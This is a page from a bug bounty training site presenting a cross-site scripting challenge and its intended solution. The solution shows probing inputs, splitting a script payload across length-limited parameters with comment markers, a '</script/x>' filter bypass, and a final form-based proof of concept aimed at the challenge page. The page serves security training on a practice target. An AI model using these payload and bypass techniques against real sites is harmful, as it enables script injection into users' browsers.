Important information
Our challenges do NOT require any bruteforcing/directory fuzzing/massive amounts of traffic. Please practise hacking on our challenges manually.
Failure to abide by the rules will put you at risk of being restricted from using our free challenges.
"I've won a bounty" generator
Medium
Cross Site Scripting (XSS)
We know people love to say they've some bounties so simply input your username & bounty amount and then generate your image!
Can you discover how the application works and if there's anything interesting happening? Perhaps there is XSS somewhere hidden here.
Completed the challenge?
You can browse the intended solution to this challenge below.
Solution
This is based on a real XSS finding where I had limited characters to use but multiple inputs, where one input had unlimited characters (where the javascript to execute goes!).
Firstly you'll notice that the bounty amount value must be an integer, so it won't be vulnerable to anything interesting, but what else is sent with the request?
username=test&bountyamnt=100&platform=hackerone¤cy=dollar
Currency and platform.
First we test each parameter for basic XSS tests with ">.
username=test">&bountyamnt=100&platform=hackerone">¤cy=dollar">
Which gives us in the response:
<input type="hidden" name="currency" value="dollar">">
<p>test"> </p>
<input type="hidden" name="platform" value="hackerone">">
Okay so platform and currency are vulnerable to XSS. So let's just try "><svg/onload=alert(0)>. Easy , right?
<input type="hidden" name="currency" value="test"><svg/o">
<div class="top-right" style="margin-top:25px;">
<p>test">svg/onload=alert(0)> </p>
<p>won a</p>
<p class="text-primary">$100</p>
<p>BOUNTY!</p>
</div>
<input type="hidden" name="platform" value="test"><svg/on">
Hmm, it's restricting the length of our payload. So what can we do?
Since currency is reflected first, we set this to "><script>/*. The /* characters will comment out anything else below, so what's next?
username! Ahh yes, it may not be vulnerable to XSS, but I can still add something like: */ alert(0) /*. This will uncomment, alert, and re-comment.
Okay, lastly we need to end the comment and script tag. If we try platform=*/</script> then you'll discover it's replaced to >/script>. Damn!
Enter bypass! </script/x>
Final working payload:
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://www.bugbountytraining.com/challenges/challenge-11.php" method="POST" target="_blank">
<input type="hidden" name="username" value="*/alert(0)/*" />
<input type="hidden" name="bountyamnt" value="100" />
<input type="hidden" name="platform" value="*/</script/x>" />
<input type="hidden" name="currency" value=""><script>/*" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Getting started
Learn about vulnerability types 
Getting started in bug bounties 
Test your knowledge
Free Web Application Challenges
Guides for your hunts 
ZSeano's Methodology
Effective Note Taking for bug bounties
Useful Resources 
Disclosed HackerOne Reports 
Our community
Endorsed Members
Hackevents 
Member Articles